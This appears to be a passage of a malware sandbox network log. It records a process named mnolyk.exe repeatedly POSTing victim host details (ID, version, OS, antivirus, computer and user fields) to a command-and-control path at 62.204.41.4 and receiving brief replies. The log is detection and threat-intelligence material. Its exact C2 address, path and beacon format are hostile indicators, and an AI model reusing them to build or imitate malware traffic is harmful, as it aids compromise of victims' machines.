426	192.168.2.5	50137	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:06.138197899 CET	652	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:06.202161074 CET	652	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
427	192.168.2.5	50139	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:06.422233105 CET	653	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:06.484899044 CET	659	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
428	192.168.2.5	50140	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:06.654083967 CET	660	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:06.717000961 CET	661	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
429	192.168.2.5	50141	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:06.885723114 CET	661	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:06.948308945 CET	662	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.5	49743	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:16.382886887 CET	171	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:16.449038982 CET	171	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
430	192.168.2.5	50142	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:07.121016026 CET	662	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:07.186088085 CET	663	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
431	192.168.2.5	50143	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:07.357882023 CET	663	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:07.423434973 CET	664	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
432	192.168.2.5	50144	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:07.591285944 CET	664	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:07.656039000 CET	665	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
433	192.168.2.5	50145	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:07.823730946 CET	665	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:07.886898041 CET	666	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
434	192.168.2.5	50146	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:08.058254004 CET	666	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:08.123910904 CET	667	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
435	192.168.2.5	50147	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:08.302721024 CET	667	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:08.367331028 CET	668	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
436	192.168.2.5	50148	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:08.546698093 CET	668	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:08.611357927 CET	669	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
437	192.168.2.5	50149	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:08.801457882 CET	669	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:08.865505934 CET	670	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
438	192.168.2.5	50150	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:09.040992022 CET	670	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:09.104100943 CET	671	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
439	192.168.2.5	50151	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:09.287465096 CET	671	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:09.350429058 CET	672	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.5	49744	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:16.664079905 CET	172	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:16.729906082 CET	172	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
440	192.168.2.5	50152	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:09.531893969 CET	672	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:09.594541073 CET	673	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
441	192.168.2.5	50153	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:09.775607109 CET	673	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:09.838295937 CET	674	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
442	192.168.2.5	50154	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:10.010091066 CET	674	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:10.075062990 CET	675	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
443	192.168.2.5	50155	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:10.245942116 CET	675	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:10.309608936 CET	676	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
444	192.168.2.5	50156	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:10.481823921 CET	676	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:10.545644999 CET	677	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
445	192.168.2.5	50157	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:10.761627913 CET	677	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
